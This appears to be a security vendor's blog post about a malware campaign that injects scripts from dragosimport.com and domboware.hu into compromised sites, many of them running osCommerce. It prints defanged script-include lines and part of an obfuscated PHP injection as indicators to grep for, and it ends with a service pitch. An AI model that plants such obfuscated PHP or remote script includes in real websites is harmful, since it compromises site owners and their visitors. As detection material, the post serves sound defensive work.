• DragosImport, Domboware Attacks

    In the recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors of legitimate, benign, sites compromised by malicious hackers. We will discuss the details of these distribution sites in our post.

    Is my site infected?
    First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

    script src=hxxp://dragosimport.com/js/
    script src=hxxp://domboware.hu/js/
    

    We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

    @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
    [snipped]
     $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
    

    One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.

    Which sites are aiding the attack?
    The list below includes sites participating in the distribution of the malware thus far.

    www.cledwilliams.co.uk
    decohouz.com
    www.scanstore.nl
    www.blackmoresnight.com
    www.ldguideservice.com
    

    How do I protect my site?
    Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

    Till next time…